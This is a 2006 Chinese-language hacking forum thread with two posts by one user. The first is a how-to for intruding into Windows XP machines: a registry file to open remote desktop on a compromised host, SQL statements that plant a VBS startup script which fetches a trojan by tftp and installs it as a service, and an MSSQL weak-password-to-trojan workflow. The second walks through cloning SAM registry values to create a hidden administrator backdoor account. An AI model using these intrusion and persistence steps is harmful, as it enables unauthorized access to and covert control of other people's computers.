史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-01-12, 01:35 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 入侵XP最新方法

入侵XP最新方法



最近論壇中有好多人都在問如何入侵XP。而且還都在用入侵2000的老方法對付XP。這是行不通的。我做了一個總結,看看可以使你對XP有一個清醒的認識,並從中找出一些入侵XP的好的方法。
入侵xp一向來都是很困難,但並不是不能入侵。 只是xp的安全性相對於windows其它糸列好些罷了,下面是xp的一些特點:
第一:xp的ipc$命名管道預設是guest用戶權限登入,並且密碼不能為空,可以通過mmc 增加管理單元去修改,充許任何用戶權限登入,但需桌面交互,和獲得管理員權限. (這就是為什麼要開3389的原因)
第二:xp糸統不支持多用戶同時登入,同一時間只能充許一個用戶連接和登入,建義使用 system權限進入xp主機(也就是用溢位,溢位成功後都直接進入system32目錄,或種植木馬),所以通過各種 方法入侵xp主機後的第一步並不是增加一個用戶名,而是上傳一個木馬程序更為實際. 因為在沒有開啟終端或模擬終端的情況下,就算你擁有一台xp主機的用戶和密碼, 也沒什麼用。
第三:現在來說說XP的遠端終端連接。xp原有的的遠桌面連接(3389終端),安裝時預設已經安裝和啟動,你只要開啟電腦內容但要遠端連接,還 需要更改一下設定,最簡單的方法遠端修改註冊表(這種方法好處在於不用桌面交互),當 然你也可以用slave等遠端桌面管理軟體來開啟,但是這樣容易暴露,你的一舉一動都
會在桌面有顯示.下面指出註冊表修改方法:
新增一註冊表文件,內容為:
regedit4 (一定要大寫)

[hkey_local_machine\system\currentcontrolset\control\terminal serve]
"fdenytsconnections"=dword:00000000
假如把上面的註冊表文件存為3389.reg,把3389.reg上傳到肉機執行regedit /s 3389.reg
,這樣就可以遠端連接了。
第四:如果你想像2000那樣映射XP的共享硬碟,要通過修改對方的本機安全原則。在【可匿名訪問的工享】中增加上c$,d$..等。
第五:xp中的模擬終端服務啟動後預設為ntlm驗證,可以用xp原有的的tlntadmn(net start 只能在本機啟動模擬終端服務)指令開啟遠端主機的telnet,而shutdown指令可以關閉遠端主機,sc指令也以組態遠端服務......,這些是xp原有的的小工具 .
第六:另外XP原有的的自動更新和防火牆也為XP增強了一些安全保護。

好了,XP的一些特點介紹完了。現在總結一些入侵XP的具體辦法。
首先我現總結一下我得入侵體會。第一:由於XP不支持管理員權限IPC$連接,所以不能直接在DOS下複製文件。一但進入XP的系統目錄,首先應該在本機主機建立一個FTP伺服器,用來方便快捷的上傳和下載文件。第二:入侵系統後建立帳戶時,不但要把它加入ADMINISTRATORS組,還要把它加入GUESTS組。因為XP的許多限制預設都是都是guest權限的,把它加入了管理員組,無形之中就使這些連接具有了admin權限。切記只是突破XP各種限制的突破口。第三:在後門
的選項上,可以多考慮一下3389。這可是2000所沒有的。你用工具開他的遠端桌面連接,既省掉了木馬被殺的風險,而且可以完全控制對方電腦。第四:好好利用XP的【本機全原則】,其實XP的好多限制都來自這裡,包括用戶和遠端訪問的限制。你一但同過3389遠端登入到對方主機,首先就要更改它的設定。下面舉幾個實例:
【本機安全原則】-【使用者權利指派】-【從網路訪問此電腦】中入"guest"用戶。這樣你就能在本機【執行】中輸入
ip 瀏覽對方共享目錄了。
【本機安全原則】-【使用者權利指派】-【拒絕從網路訪問此電腦】中移除"guest"用戶。
還有很多方法可以為自己提高權限,通過註冊表等等。就看你如何利用了。這裡就不多說了

接著介紹一些入侵XP的方法:
當然溢位還是絕對的主角,他的好處是可以得到"cmdshell"。缺點就是成功率不太高,要有耐心。
對沒打修正檔的XPsp1來說MS04011,MS03049漏洞還是很多的(ms05039主要這對的是2000)。直接溢位,不用在本機開連接阜,溢位成功後用telnet直接登入就行了。
還有就是掃瞄135連接阜,看有沒有rpc溢位,這是比較流行的。工具網上又很多自己去搜吧。
最後是利用資料庫入侵。傳統的是mysql和mssql。前者我沒試過所以找了些資料大家看看吧:
mysql入侵
工具:wineggdropshell v1.35
[1]用mysql連接你擁有用戶名和密碼的遠端mysql數庫.
[2]新增一個資料表後,安格式把下面兩行語句寫到新增的資料表中假如你新增的資料表為aa,
(1)insert into aa values ("set wshshell=createobject (""wscript.shell"")");
(2)insert into aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -install) && (net start win135)"",0)");

[3]把新增的資料表為指令碼文件並匯出到啟動項:
select * from aa into outfile "c:\\docume~1\\alluse~1\\「開始」表單\\程序\\啟動\\aa.vbs";
[4]儲存成功後,只要對方重啟你就可以用木馬登入了

mssql,哈哈不多說了相信大家都聽說過了:
首先掃瞄1433連接阜開放的主機,然後用x-scan中掃瞄mssql弱密碼 。 再用sqlexec連接帶有弱密碼的主機 ,接著用tftp上傳木馬 ,用木馬的system權限登入後,再上傳3389.reg開他的遠端終端。用3389登入後.別忘了冊掉新增的用戶,因為xp登入對話視窗中會把新增的用戶顯示出來.除非你是用的內裝帳戶,或複製的內裝賬戶。

這就是我入侵XP的一些經驗。希望可以為大家提供一些參考。

更新:不要指望在XP上開3389了,雖然可以通過註冊表開啟遠端桌面連接。但是XP只允許一個用戶在同一時間登入。沒辦法更改。網上傳說的修改註冊表的方法:
HKEY鐺OCAL鐸A-CHINE@System@CurrentControlSet@Control@Terminal Server@Licensing Corec分支,新增一個名為「EnableConcurrentSessions」的DWORD值,將鍵值設定為「1」,就可以讓Windows XP支持兩個用戶。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
舊 2006-01-16, 08:59 PM   #2 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

教你建立隱藏的超級用戶

對regedit.exe我想大家都很熟悉,但卻不能對註冊表的項鍵設定權限,而regedt32.exe最大的優點就是能夠對註冊表的項鍵設定權限。nt/2000/xp的帳戶訊息都在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統用戶SYSTEM外,其它用戶都無權檢視到裡面的訊息,因此我首先用regedt32.exe對SAM鍵為我設定為「完全控制」權限。這樣就可以對SAM鍵內的訊息進行讀寫了了。具體步聚如下:

1、假設我們是以超級用戶administrator登入到開有終端服務的目標物上的,首先在指令行下或帳戶管理器中建立一個帳戶:hacker$,這裡我在指令行下建立這個帳戶 net user hacker$ 1234 /add

2、在開始/執行中輸入:regedt32.exe並Enter鍵來執行regedt32.exe。

3、點「權限」以後會彈出視窗點增加將我登入時的帳戶增加到安全欄內,這裡我是以administrator的身份登入的,所以我就將administrator加入,並設定權限為「完全控制"。這裡需要說明一下:最好是增加你登入的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這裡將你增加的帳戶移除即可。

4、再點「開始」→「執行」並輸入"regedit.exe" Enter鍵,啟動註冊表編輯器regedit.exe。 開啟鍵:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、將項hacker$、00000409、000001F4匯出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個匯出的文件進行編輯,將超級用戶對應的項000001F4下的鍵"F"的值複製,並覆蓋hacker$對應的項00000409下的鍵"F"的值,然後再將00000409.reg與hacker.reg合併。

6、在指令行下執行net user hacker$ /del將用戶hacker$移除:net user hacker$ /del

7、在regedit.exe的視窗內按F5重新整理,然後打文件-匯入註冊表文件將修改好的hacker.reg匯入註冊表即可

8、到此,隱藏的超級用戶hacker$已經建好了,然後關閉regedit.exe。在regedt32.exe視窗內把HKEY_LOCAL_MACHINE\SAM\SAM鍵權限改回原來的樣子(只要移除增加的帳戶administrator即可)。

9、注意:隱藏的超級用戶建好後,在帳戶管理器看不到hacker$這個用戶,在指令行用「net user」指令也看不到,但是超級用戶建立以後,就不能再改密碼了,如果用net user指令來改hacker$的密碼的話,那麼在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能移除。
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 08:59 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1